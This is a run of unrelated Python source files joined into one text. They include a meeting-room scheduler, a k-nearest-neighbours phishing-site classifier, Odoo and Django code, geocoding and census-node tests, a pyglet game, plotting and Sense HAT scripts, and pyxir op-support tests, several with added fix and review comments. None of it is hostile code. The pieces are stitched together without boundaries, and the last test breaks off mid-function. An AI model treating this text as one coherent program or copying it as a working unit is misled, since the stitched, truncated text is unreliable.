    def minMeetingRooms(self, intervals):
        """Greedy room assignment tracking only each room's last end time.

        :type intervals: List[List[int]]
        :rtype: int
        """
        if not intervals:
            return 0
        # FIX: `sorted(..., cmp=...)` is Python-2-only; the equivalent key
        # sort orders by start time, breaking ties on end time.
        intervals = sorted(intervals, key=lambda iv: (iv[0], iv[1]))
        # lasts[j] is the end time of the meeting occupying room j.
        lasts = [intervals[0][1]]
        for cur in intervals[1:]:
            for j, last in enumerate(lasts):
                if last <= cur[0]:
                    # Room j is free; it is now busy until this meeting ends.
                    lasts[j] = max(last, cur[1])
                    break
            else:
                lasts.append(cur[1])
        return len(lasts)
|
import numpy as np
import pandas as pd
from collections import Counter
import random
import time
from scipy.io import arff
# Phishing-website dataset; the 'id' column is a row identifier we drop.
df = pd.read_csv('data.csv')
df=df.drop(columns=['id'])
# Wall-clock timer for the whole run (reported at the bottom of the script).
start=time.time()
def k_nearest_neighbours(data, predict, k):
    """Classify *predict* by majority vote among its *k* nearest neighbours.

    FIX: removed the leftover debug print inside the voting loop — it ran
    once per neighbour per prediction and flooded stdout.

    Args:
        data: dict mapping class label -> list of feature vectors.
        predict: feature vector to classify.
        k: number of neighbours to consult.
    Returns:
        The most common class label among the k closest training points.
    """
    distances = []
    for group in data:
        for features in data[group]:
            euclid_distance = np.linalg.norm(np.array(features) - np.array(predict))
            distances.append((euclid_distance, group))
    votes = [group for _, group in sorted(distances)[:k]]
    return Counter(votes).most_common(1)[0][0]
# Sentinel for missing values so distances stay finite but extreme.
df.fillna(-99999, inplace=True)
full_data = df.values.tolist()
test_size = 0.01  # fraction of rows held out for the accuracy estimate
train_set = {-1: [], 1: []}
test_set = {-1: [], 1: []}
# FIX: when int(test_size * len) rounds to 0, `full_data[:-0]` is the EMPTY
# list and `full_data[-0:]` is everything — exactly backwards.  Guard it.
n_test = int(test_size * len(full_data))
train_data = full_data[:-n_test] if n_test else full_data
test_data = full_data[-n_test:] if n_test else []
# Last column is the class label (-1 phishing, 1 legitimate).
for row in train_data:
    train_set[row[-1]].append(row[:-1])
for row in test_data:
    test_set[row[-1]].append(row[:-1])
data = [-1,0,-1,1,-1,0,1,1,-1,1,1,-1,1,0,0,-1,-1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,1,-1,-1]
print("The website to be predicted has the following features")
print(data)
vote = k_nearest_neighbours(train_set, data, 7)
print(vote)
if vote == 1:
    print("The website is Legitimate")
if vote == -1:
    # FIX: typo "webisite" in the user-facing message.
    print("The website is a Phishing website")
correct = 0
total = 0
# Finding the accuracy on the held-out split.
for group in test_set:
    # Renamed loop variable (was `data`) so it no longer shadows the demo sample.
    for sample in test_set[group]:
        vote = k_nearest_neighbours(train_set, sample, 7)
        print(vote, group)
        if group == vote:
            correct = correct + 1
        total = total + 1
accuracy = correct / total * 100 if total else 0.0
print("Accuracy=", accuracy)
end = time.time()
print("Time elapsed=", round((end - start), 2), "seconds")
from odoo import models, fields, api, _
class AccountTax(models.Model):
    # Extends the core tax model with an EWT structure link and a custom
    # computation mode for VAT-inclusive base deductions.
    _inherit = 'account.tax'
    # NEW FIELDS
    ewt_structure_id = fields.Many2one('account.ewt.structure', string='EWT Structure')
    # EXTEND: re-declare the selection to append the custom 'base_deduction' mode.
    amount_type = fields.Selection(selection=[('group', 'Group of Taxes'), ('fixed', 'Fixed'), ('percent', 'Percentage of Price'), ('division', 'Percentage of Price Tax Included'), ('base_deduction','Percentage of Price Tax Included Deduction - Custom')])
    def _compute_amount(self, base_amount, price_unit, quantity=1.0, product=None, partner=None):
        # Delegate to the standard computation, then override for the custom mode.
        res = super(AccountTax, self)._compute_amount(base_amount, price_unit, quantity, product, partner)
        if self.amount_type == 'base_deduction':
            # base_amount = price_unit
            # tax_amount = price_unit * self.amount / 100
            # Strips tax from the base before applying the percentage.
            # NOTE(review): 1.12 is presumably the Philippine 12% VAT divisor,
            # hard-coded — confirm and consider deriving it from configuration.
            return base_amount / 1.12 * self.amount / 100
        return res
|
# coding: utf-8
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'Pinbot.settings'
from resumes.models import (
ContactInfoData,
ResumeData,
)
from feed.models import (
FeedResult,
)
from pin_utils.django_utils import (
get_oid,
)
def main():
    # Collect the resume ids whose contact info was sourced from 'brick'...
    resume_sid_list = list(ContactInfoData.objects.filter(
        source='brick',
    ).values_list(
        'resume_id',
        flat=True,
    ))
    # ...convert the string ids to ObjectIds...
    resume_oid_list = [get_oid(i) for i in resume_sid_list]
    # ...and stamp the same source onto the resumes and their feed results.
    ResumeData.objects.filter(
        id__in=resume_oid_list
    ).update(
        set__source='brick',
    )
    FeedResult.objects.filter(
        resume__in=resume_oid_list
    ).update(
        set__feed_source='brick',
    )
if __name__ == '__main__':
    main()
|
# Exercise: if / if-else / if-elif-else practice with alien colors.
# NOTE: the misspelled value "grenn" is intentional in several cases below —
# it exists to drive execution into the negative/else branches.
alien_color="green"
if alien_color=="green":
    print("You get 5 points!")
alien_color="red"
if alien_color=="grenn":
    print("You get 5 points!")
alien_color="grenn"
if alien_color=="green":
    print("You get 5 points!")
else:
    print("You get 10 points!")
alien_color = "grenn"
if alien_color != "green":
    print("You get 10 points!")
else:
    print("You get 5 points!")
alien_color="green"
if alien_color=="grenn":
    print("You get 5 points!")
elif alien_color=="yellow":
    print("You get 10 points!")
else:
    print("You get 15 points!")
# Age-based life-stage classification (labels in Chinese, as in the original).
age=19
if age<2:
    name="婴儿"
elif age<4:
    name="正蹒跚学步"
elif age<13:
    name="儿童"
elif age<20:
    name="青少年"
elif age<65:
    name="成年人"
else:
    name="老年人"
print("你是一个"+name)
favorite_fruit=["apples","pears","peaches"]
if "apples" in favorite_fruit:
    print("You really like apples!")
if "oranges" in favorite_fruit:
    # FIX: typo "rally" -> "really" in the printed message.
    print("You really like oranges!")
|
"""
Tests of this module depends on external connectivity and availability of
openstreetmap services.
"""
from conftest import REDIS_HOST, REDIS_PORT
from geocoding import geocoding
import copy
import geojson
import pytest
from exceptions.exceptions import InvalidNGSIEntity
def assert_lon_lat(entity, expected_lon, expected_lat):
    """Assert *entity* carries a geo:point location matching the expected coords."""
    assert 'location' in entity
    location = entity['location']
    assert location['type'] == 'geo:point'
    lon_text, lat_text = location['value'].split(',')
    assert float(lon_text) == pytest.approx(expected_lon, abs=1e-2)
    assert float(lat_text) == pytest.approx(expected_lat, abs=1e-2)
def test_valid_address():
    """An address needs at least a city or a country; a street alone is not enough.

    FIX: the original statements lacked `assert`, so every check was a
    discarded expression and the test could never fail.
    """
    assert geocoding.is_valid_address(None, 10, None, None, None)[0] is False
    assert geocoding.is_valid_address("Via San Gottardo", None, None, None, None)[0] is False
    assert geocoding.is_valid_address(None, None, None, None, None)[0] is False
    assert geocoding.is_valid_address(None, None, None, None, "Italy")[0] is True
    assert geocoding.is_valid_address(None, None, "Milan", None, None)[0] is True
    assert geocoding.is_valid_address("Via San Gottardo", None, "Milan", None, None)[0] is True
def test_non_dict_entity():
    """add_location must reject a non-dict entity with TypeError.

    FIX: the try/except form passed silently when NO exception was raised;
    pytest.raises fails the test if the call succeeds.
    """
    with pytest.raises(TypeError):
        geocoding.add_location("string")
def test_empty_dict_entity():
    """add_location must reject an entity lacking id/type with InvalidNGSIEntity."""
    with pytest.raises(InvalidNGSIEntity):
        geocoding.add_location(dict())
def test_no_address_entity():
    """An entity without an address passes through with no location added."""
    entity = {
        'id': 'test-id',
        'type': 'test-type'
    }
    res = geocoding.add_location(entity)
    assert 'address' not in res
    assert 'location' not in res
def test_entity_with_location(air_quality_observed):
    """An entity that already has a location is returned unchanged."""
    # Adding location to an entity with location does nothing
    assert 'location' in air_quality_observed
    old_entity = copy.copy(air_quality_observed)
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert r == old_entity
def test_entity_with_non_dict_address(air_quality_observed):
    """A plain-string address value cannot be geocoded; entity is unchanged."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = "string address"
    old_entity = copy.copy(air_quality_observed)
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert r == old_entity
def test_entity_add_point(air_quality_observed):
    """A full street address geocodes to a single geo:point."""
    # NOTE(review): Antwerp sits at latitude ~51.23, longitude ~4.42, so the
    # expected_lon/expected_lat arguments here appear swapped relative to
    # their names; the assertion matches whatever order the geocoder emits —
    # confirm the naming against geocoding.add_location's output format.
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "streetAddress": "IJzerlaan",
        "postOfficeBoxNumber": "18",
        "addressLocality": "Antwerpen",
        "addressCountry": "BE",
    }
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
def test_entity_add_point_negative_coord(air_quality_observed):
    """Western-hemisphere addresses keep their negative coordinate."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "streetAddress": "Calle Acolman",
        "postOfficeBoxNumber": "22",
        "postalCode": "55120",
        "addressLocality": "Ecatepec de Morelos",
        "addressCountry": "MX",
    }
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert_lon_lat(r, expected_lon=19.5411019, expected_lat=-99.0341571)
def test_entity_add_street_line(air_quality_observed):
    """A street without a house number geocodes to a LineString geometry."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "streetAddress": "Acolman",
        "addressLocality": "Ciudad de México",
        "addressCountry": "MX",
    }
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert 'location' in r
    assert r['location']['type'] == 'geo:json'
    geo = r['location']['value']
    assert geo['type'] == 'LineString'
    assert len(geo['coordinates']) > 1
def test_entity_add_city_shape(air_quality_observed):
    """A city-only address geocodes to a valid Polygon boundary."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "addressCountry": "MX",
        "addressLocality": "Ciudad de México",
    }
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert 'location' in r
    assert r['location']['type'] == 'geo:json'
    geo = r['location']['value']
    assert geo['type'] == 'Polygon'
    polygon = geojson.Polygon(geo['coordinates'])
    assert polygon.is_valid
def test_entity_add_country_shape(air_quality_observed):
    """A country-only address geocodes to a valid MultiPolygon boundary."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "addressCountry": "MX",
    }
    r = geocoding.add_location(air_quality_observed)
    assert r is air_quality_observed
    assert 'location' in r
    assert r['location']['type'] == 'geo:json'
    geo = r['location']['value']
    assert geo['type'] == 'MultiPolygon'
    multi_polygon = geojson.MultiPolygon(geo['coordinates'])
    assert multi_polygon.is_valid
def test_multiple_entities(air_quality_observed):
    """add_locations handles a list and returns one result per entity."""
    entity_2 = copy.copy(air_quality_observed)
    r = geocoding.add_locations([air_quality_observed, entity_2])
    assert isinstance(r, list)
    assert len(r) == 2
def test_caching(docker_redis, air_quality_observed, monkeypatch):
    """A second lookup of the same address is served from the Redis cache."""
    air_quality_observed.pop('location')
    air_quality_observed['address']['value'] = {
        "streetAddress": "IJzerlaan",
        "postOfficeBoxNumber": "18",
        "addressLocality": "Antwerpen",
        "addressCountry": "BE",
    }
    from geocoding.geocache import temp_geo_cache
    cache = next(temp_geo_cache(REDIS_HOST, REDIS_PORT))
    assert len(cache.redis.keys('*')) == 0
    try:
        r = geocoding.add_location(air_quality_observed, cache=cache)
        assert r is air_quality_observed
        assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
        assert len(cache.redis.keys('*')) == 1
        # Make sure no external calls are made
        monkeypatch.delattr("requests.sessions.Session.request")
        r.pop('location')
        r = geocoding.add_location(air_quality_observed, cache=cache)
        assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
        assert len(cache.redis.keys('*')) == 1
    finally:
        # Always wipe Redis so later tests start from an empty cache.
        cache.redis.flushall()
def test_health():
    """The geocoder health endpoint reports a passing status.

    FIX: the original comparison lacked `assert`, making the test a no-op.
    """
    assert geocoding.get_health()['status'] == 'pass'
|
from mk_livestatus import Socket
import json,subprocess,re,time,collections,sys,pymongo,os,datetime
from pymongo import MongoClient
# MongoDB endpoint that holds the host inventory database.
mongoserver = "app161vm4.glam.colo"
mongoport = 27017
mydb = "inventory"
# Logical source name -> collection name.
mycollections = {'ansible':"ansible",'check_mk':"cmk",'inventory':"inventory"}
# Per-source accumulators keyed by host.
cmkdict = collections.defaultdict(dict)
ansibledict = collections.defaultdict(dict)
inventorydict = collections.defaultdict(dict)
opdict = collections.defaultdict(dict)
# Datacenter -> [nagios host, livestatus unix-socket path].
mydc = {'colo':["nagios.glam.colo","/omd/sites/nagiosmon1/tmp/run/live"],'ggva':["nagios.ggva.glam.colo","/omd/sites/ggva_nagios/tmp/run/live"],'scl':["nagios.scl.glam.colo","/omd/sites/glam_ning/tmp/run/live"]}
#pip install python-mk-livestatus
#pip install pymongo
#import inventorydb_v4
import sys
def get_dbdata(host):
    # Fetch the inventory document whose _id is *host*.  (Python 2 code.)
    try:
        conn = pymongo.MongoClient(mongoserver,mongoport)
        print "Connected to MongoDB successfully"
    except pymongo.errors.ConnectionFailure, e:
        print "Could not connect to MongoDB: %s" % e
        # NOTE(review): execution continues after a failed connect, so the
        # lookup below would raise NameError on the undefined `conn`.
    db = conn[mydb]
    collname = "inventory"
    collection = db[collname]
    # NOTE(review): the client connection is never closed.
    op = collection.find_one({'_id': host})
    #count = collection.find({'_id':host}).count()
    return op
# Look up the host named on the command line and dump the raw document.
op=get_dbdata(sys.argv[1])
print op
print type(op)
|
from django.urls import path
from . import views
# Recipe app routes; the names are referenced from templates via {% url %}.
urlpatterns = [
    path('', views.index, name='index'),
    # Recipe detail page by primary key.
    path('<int:receita_id>', views.receita, name='receita'),
    path('buscar', views.buscar, name='buscar'),
    path('cria/receita', views.cria_receita, name='cria_receita'),
    path('deleta/<int:receita_id>', views.deleta_receita, name='deleta_receita'),
    path('editar/<int:receita_id>', views.editar_receita, name='editar_receita'),
    path('atualiza_receita', views.atualiza_receita, name='atualiza_receita')
]
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import atexit
import time
import json
import getopt
import sys
from client import Client
def check_game_status(game_state):
    """Terminate the process (printing the reason) once the game has finished."""
    if not game_state['finished']:
        return
    print(game_state['reason'])
    exit(0)
def my_algo(game_state):
    """Decide this turn's move: (stones_to_take, use_reset).

    *game_state* is None on the opening move, otherwise a dict such as::

        {
            'stones_left': 4,
            'current_max': 3,
            'stones_removed': 3,
            'finished': False,
            'player_0': {'time_taken': 0.003, 'name': 'my name', 'resets_left': 2},
            'player_1': {'time_taken': 13.149, 'name': 'b2', 'resets_left': 1},
            'reset_used': True
            'init_max': 3
        }
    """
    print(game_state)
    time.sleep(0.1)
    if not game_state:
        return 1, False
    remaining = game_state['stones_left']
    if remaining < 10:
        return 1, False
    if remaining < 20:
        return 1, True
    return 1, False
if __name__ == '__main__':
    # Read these from stdin to make life easier
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'fn:')
    except getopt.GetoptError:
        sys.stderr.write(__doc__)
        exit(-1)
    # -f flag: this client makes the opening move.
    goes_first = False
    for o, a in opts:
        if o == '-f':
            goes_first = True
    # Connect to the local game server and make sure the socket is closed on exit.
    ip = '127.0.0.1'
    port = 9000
    client = Client('Sephiroth', goes_first, (ip, port))
    atexit.register(client.close)
    stones = client.init_stones
    resets = client.init_resets
    # Opening move when playing first (no game state yet).
    if goes_first:
        num_stones, reset = my_algo(None)
        check_game_status(client.make_move(num_stones, reset))
    # Main loop: receive opponent move, decide, report state, then move.
    while True:
        game_state = client.receive_move()
        check_game_status(game_state)
        # Some parsing logic to convert game state to algo_inputs
        num_stones, reset = my_algo(game_state)
        print('You took %d stones%s' % (num_stones,
                                        ' and used reset.' if reset else '.'))
        print('Current max: %d' % game_state['current_max'])
        print('Stones left: %d' % game_state['stones_left'])
        print('Player %s has %d resets left' % (game_state['player_0']['name'], game_state['player_0']['resets_left']))
        print('Player %s has %d resets left' % (game_state['player_1']['name'], game_state['player_1']['resets_left']))
        print('---------------------------------------')
        if game_state['finished']:
            print('Game over\n%s' % game_state['reason'])
            exit(0)
        check_game_status(client.make_move(num_stones, reset))
|
def isEven(number):
    """Return True when *number* is even.

    FIX: the original built a list of the first `number` even values and did
    a linear membership test — O(n) time and memory — and, worse, reported 0
    and every negative number as odd (their candidate lists never contained
    them).  A modulo test is O(1) and correct for all integers.
    """
    return number % 2 == 0
print(isEven(100))
import statistics
# NOTE(review): the results below are computed and discarded — this reads as
# a REPL transcript; wrap the calls in print() to see output as a script.
data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]
statistics.mean(data)  # arithmetic mean
# 1.6071428571428572
statistics.median(data)  # median
# 1.25
statistics.variance(data)  # sample variance
# 1.3720238095238095
|
import pyglet
from . import Player, Enemy, Bullet
pyglet.resource.path = ['./Assets']
pyglet.resource.reindex()
def centerImage(image):
    """Move *image*'s anchor point to its geometric center."""
    half_width = image.width // 2
    half_height = image.height // 2
    image.anchor_x = half_width
    image.anchor_y = half_height
def createBackground():
    """Create the sprite for the default (blue nebula) background."""
    image = pyglet.resource.image("Backgrounds/Nebula Blue.png")
    return pyglet.sprite.Sprite(img=image, x=0, y=0)
def createHarderBackground():
    """Create the sprite for the stage-2 (aqua-pink nebula) background."""
    image = pyglet.resource.image("Backgrounds/Nebula Aqua-Pink.png")
    return pyglet.sprite.Sprite(img=image, x=0, y=0)
def createHellBackground():
    """Create the sprite for the stage-3 (red nebula) background."""
    image = pyglet.resource.image("Backgrounds/Nebula Red.png")
    return pyglet.sprite.Sprite(img=image, x=0, y=0)
def createPlayer():
    """Create the player sprite, centered mid-screen at scale 1."""
    image = pyglet.resource.image("Sprites/Player.png")
    centerImage(image)
    sprite = pyglet.sprite.Sprite(img=image, x=1920 // 2, y=1080 // 2)
    sprite.scale = 1
    return sprite
def createEnemy():
    """Create an enemy sprite, centered mid-screen at scale 1."""
    image = pyglet.resource.image("Sprites/Enemy.png")
    centerImage(image)
    sprite = pyglet.sprite.Sprite(img=image, x=1920 // 2, y=1080 // 2)
    sprite.scale = 1
    return sprite
def createBullet():
    """Create a bullet sprite, centered mid-screen at scale 1."""
    image = pyglet.resource.image("Sprites/Bullet.png")
    centerImage(image)
    sprite = pyglet.sprite.Sprite(img=image, x=1920 // 2, y=1080 // 2)
    sprite.scale = 1
    return sprite
# Class for storing game resources
class Game():
    """Holds all game state: HUD labels, sprites, object lists and audio."""
    def __init__(self):
        # Labels
        self.score_label = pyglet.text.Label(text="Score: 0", x=1920 // 2, y=1080 - 32)
        self.round_label = pyglet.text.Label(text="Round: 1", x=32, y=32)
        self.life_label = pyglet.text.Label(text="Lives: 3", x=32, y=64)
        self.kills_label = pyglet.text.Label(text="Kills: 0", x=32, y=96)
        # Sprites
        self.background_sprite = createBackground()
        self.player = Player.Player()
        # Lists of stuff
        self.enemy_list = []
        self.enemy_count = 0
        self.bullet_list = []
        self.bullet_count = 0
        self.objects = [self.player] + self.enemy_list + self.bullet_list
        # Other game stuff
        self.counter = 0
        self.spawnRate = 1
        self.difficulty = 1
        self.stage = 1
        self.score = 0
        # Audio stuff
        self.music = pyglet.resource.media('Sounds/Never Run.mp3')
        self.gunshot = pyglet.media.StaticSource(pyglet.media.load('Assets/Sounds/Gunshot.wav'))
        self.new_stage = pyglet.media.StaticSource(pyglet.media.load('Assets/Sounds/Guitar Riff.wav'))
    def spawnEnemy(self, difficulty):
        """Add a new enemy scaled to the current difficulty."""
        self.enemy = Enemy.Enemy(difficulty)
        self.enemy_list.append(self.enemy)
    def killEnemy(self, enemy):
        """Remove *enemy* from play and award score/kills."""
        # objects = [player] + enemies + bullets, so enemy index is offset by 1.
        self.enemy_index = self.objects.index(enemy) - 1
        self.enemy_list.pop(self.enemy_index)
        self.player.kills += 1
        self.score += 100 * self.difficulty
    def fireBullet(self):
        """Spawn a bullet at the player's position and heading."""
        self.gunshot.play()
        self.bullet = Bullet.Bullet(self.player.sprite.rotation, self.player.sprite.x, self.player.sprite.y)
        self.bullet_list.append(self.bullet)
    def killBullet(self, bullet):
        """Remove *bullet* from play."""
        # Bullets sit after the player and all enemies in self.objects.
        self.bullet_index = self.objects.index(bullet) - self.enemy_count - 1
        self.bullet_list.pop(self.bullet_index)
    def update(self, dt):
        """Advance the game state by *dt* seconds."""
        # Swap background/stage once the difficulty crosses a threshold.
        # FIX: the old guard `(self.stage != 2 or self.stage != 2)` was always
        # true, and the stage-2 branch compared the *sound source*
        # (self.new_stage) against 2 — so while 10 < difficulty < 30 the riff
        # replayed and the background was rebuilt on every frame.
        if self.difficulty > 10:
            if self.difficulty > 30 and self.stage != 3:
                self.new_stage.play()
                self.stage = 3
                self.background_sprite = createHellBackground()
            elif self.difficulty < 30 and self.stage != 2:
                self.new_stage.play()
                self.stage = 2
                self.background_sprite = createHarderBackground()
        # See if we need to spawn in an enemy; the spawn interval tightens as
        # the score grows.
        self.spawnRate = (1000/(self.score + 1))**(1/5)
        self.counter += dt
        if self.player.alive:
            if self.counter > self.spawnRate:
                self.spawnEnemy(self.difficulty)
                self.counter = 0
                self.difficulty += 1
        # Update game objects list and counts
        self.objects = [self.player] + self.enemy_list + self.bullet_list
        self.enemy_count = len(self.enemy_list)
        self.bullet_count = len(self.bullet_list)
        # Update each live object; cull the dead ones.
        for obj in self.objects:
            if obj.alive:
                obj.update(dt, self.objects)
            else:
                if obj.type == "bullet":
                    self.killBullet(obj)
                elif obj.type == "enemy":
                    self.killEnemy(obj)
        # Update labels
        self.score_label.text = "Score: " + str(self.score)
        self.life_label.text = "Lives: " + str(self.player.lives)
        self.kills_label.text = "Kills: " + str(self.player.kills)
|
from django.contrib import admin
from .models import langkah, gambar_langkah
# Register your models here.
# Expose the recipe-step models in the Django admin interface.
admin.site.register(langkah)
admin.site.register(gambar_langkah)
import pytest
import os
import sys
import pickle
# If there is __init__.py in the directory where this file is, then Python adds das_decennial directory to sys.path
# automatically. Not sure why and how it works, therefore, keeping the following line as a double
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
try:
import nodes
except ImportError as e:
import programs.engine.nodes as nodes
def aNode():
    """Build a minimal two-level geounitNode for the slots test."""
    return nodes.geounitNode(geocode='44', geocodeDict={2: 'State', 1: 'National'})
def test_nodes_slotsFrozen():
    """A __slots__ class must reject assignment of unknown attributes."""
    n = aNode()
    with pytest.raises(AttributeError):
        n.newAttribute = "This shouldn't work."
#def test_node_init(caplog):
def test_node_init():
    """parentGeocode and geolevel are derived from the geocode's length."""
    n = nodes.geounitNode(geocode='4400700010111000', geocodeDict={16: 'Block', 12: 'Block_Group', 11: 'Tract', 5: 'County'})
    assert n.parentGeocode == '440070001011'
    assert n.geolevel == 'Block'
    n = nodes.geounitNode(geocode='44', geocodeDict={16: 'Block', 12: 'Block_Group', 11: 'Tract', 5: 'County', 2: 'State'})
    assert n.parentGeocode == '0'
    assert n.geolevel == 'State'
    with pytest.raises(AttributeError) as err:
        nodes.geounitNode(geocode='44')
    # FIX: `in err.value` tested membership on the ExceptionInfo's exception
    # object; the message must be matched against its string form.
    assert 'geocodeDict not provided for creation of geoUnitNode' in str(err.value)
def test_equal():
    """Two independent unpicklings of the same node compare equal."""
    fname = os.path.join(os.path.dirname(__file__), 'geounitnode.pickle')
    # NOTE(review): the file handles are never closed; `with open(...)` would be tidier.
    n1 = pickle.load(open(fname,'rb'))
    n2 = pickle.load(open(fname,'rb'))
    assert n1 == n2
if __name__ == "__main__":
    test_nodes_slotsFrozen()
|
from matplotlib import pyplot as plt
import pandas as pd
plt.style.use("fivethirtyeight")
#df['py_dev_y']
# Ages 25-35 with median salaries per developer group.
ages_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]
dev_y = [38496, 42000, 46752, 49320, 53200,
         56000, 62316, 64928, 67317, 68748, 73752]
# Two stacked panels sharing the x axis: line chart on top, bar chart below.
fig, (ax, ax1) = plt.subplots(nrows = 2, ncols = 1, sharex = True)
ax.plot(ages_x, dev_y, color="#444444", label="All Devs")
py_dev_y = [45372, 48876, 53850, 57287, 63016,
            65998, 70003, 70000, 71496, 75370, 83640]
ax.plot(ages_x, py_dev_y, color="#008fd5", label="Python")
js_dev_y = [37810, 43515, 46823, 49293, 53437,
            56373, 62375, 66674, 68745, 68746, 74583]
ax.plot(ages_x, js_dev_y, color="#e5ae38", label="JavaScript")
data = {
    "ages" : ages_x,
    "Python": py_dev_y,
    "JavaScript": js_dev_y
}
df = pd.DataFrame(data)
# NOTE(review): the bars show *medians* but the axis label says "Average
# Salary" — confirm which is intended.
ax1.barh(["Python", "JavaScript"], [df["Python"].median(), df["JavaScript"].median()])
ax1.set_ylabel("Average Salary")
ax.legend()
ax.set_title("Median Salary (USD) by Age")
ax.set_xlabel("Ages")
ax.set_ylabel("Median Salary (USD)")
plt.tight_layout()
plt.show()
|
#using the led on the sense hat to display a user inputed message using left and right
import sense_hat, time, random
sense = sense_hat.SenseHat()
# NOTE(review): the prompts and prints talk about *right*/*left* joystick
# pushes, but these bindings are DIRECTION_UP and DIRECTION_DOWN — presumably
# DIRECTION_RIGHT / DIRECTION_LEFT were intended; confirm against the
# intended joystick orientation before changing.
up_key = sense_hat.DIRECTION_UP
left_key = sense_hat.DIRECTION_DOWN
pressed = sense_hat.ACTION_PRESSED
message_right = input("Enter message for right joystick push:")
message_left = input("Enter message for left joystick push:")
time.sleep(1)
while True:
    # Random text colour for each scroll of the message.
    r = random.randint(0,255)
    g = random.randint(0,255)
    b = random.randint(0,255)
    events = sense.stick.get_events()
    if events:
        for e in events:
            print("starting loop")
            if e.direction == up_key and e.action == pressed:
                sense.show_message(message_right,text_colour=[r,g,b])
                print("Joystick right press detected")
            elif e.direction == left_key and e.action == pressed:
                sense.show_message(message_left,text_colour=[r,g,b])
                print("Joystick left press detected")
            else:
                print("Nothing detected")
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the dpuv2-ultra96 supported operations"""
import os
import unittest
import numpy as np
from pyxir.graph.layer.xlayer import XLayer
from pyxir.target_registry import TargetRegistry
class TestUltra96OpSupport(unittest.TestCase):
target_registry = TargetRegistry()
    @classmethod
    def setUpClass(cls):
        # Register a stub 'dpuv2-ultra96' target: the op-support checks under
        # test only need the target to exist, not working build callbacks.
        def test():
            raise NotImplementedError("")
        TestUltra96OpSupport.target_registry.register_target(
            "dpuv2-ultra96", {}, test, test, test, test
        )
    @classmethod
    def tearDownClass(cls):
        # Unregister dpu for other tests
        TestUltra96OpSupport.target_registry.unregister_target("dpuv2-ultra96")
        # TestUltra96OpSupport.target_registry.unregister_target('DPUCZDX8G-ultra96')
    def test_batchnorm_support(self):
        """BatchNorm on axis 1 is supported for small channel counts only."""
        from pyxir.contrib.dpuv2.ultra96_op_support import batchnorm_op_support
        X = XLayer(
            type=["BatchNorm"],
            name="bn1",
            shapes=[-1, 2, 4, 4],
            sizes=[32],
            bottoms=[],
            tops=[],
            targets=[],
            attrs={"axis": 1},
        )
        assert batchnorm_op_support(X, [], [])
        # 2570 channels is rejected — presumably above the DPU's channel
        # limit for this op; confirm against the target's op-support rules.
        X = XLayer(
            type=["BatchNorm"],
            name="bn1",
            shapes=[-1, 2570, 4, 4],
            sizes=[2570 * 16],
            bottoms=[],
            tops=[],
            targets=[],
            attrs={"axis": 1},
        )
        assert not batchnorm_op_support(X, [], [])
    def test_biasadd_support(self):
        """BiasAdd mirrors the BatchNorm support rule on channel count."""
        from pyxir.contrib.dpuv2.ultra96_op_support import biasadd_op_support
        X = XLayer(
            type=["BiasAdd"],
            name="bn1",
            shapes=[-1, 2, 4, 4],
            sizes=[32],
            bottoms=[],
            tops=[],
            targets=[],
            attrs={"axis": 1},
        )
        assert biasadd_op_support(X, [], [])
        X = XLayer(
            type=["BiasAdd"],
            name="bn1",
            shapes=[-1, 2570, 4, 4],
            sizes=[2570 * 16],
            bottoms=[],
            tops=[],
            targets=[],
            attrs={"axis": 1},
        )
        assert not biasadd_op_support(X, [], [])
def test_concat_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import concat_op_support
X = XLayer(
type=["Concat"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert concat_op_support(X, [], [])
X = XLayer(
type=["Concat"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not concat_op_support(X, [], [])
def test_conv2d_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import conv2d_op_support
X = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
assert conv2d_op_support(X, [], [])
X = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [3, 3], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
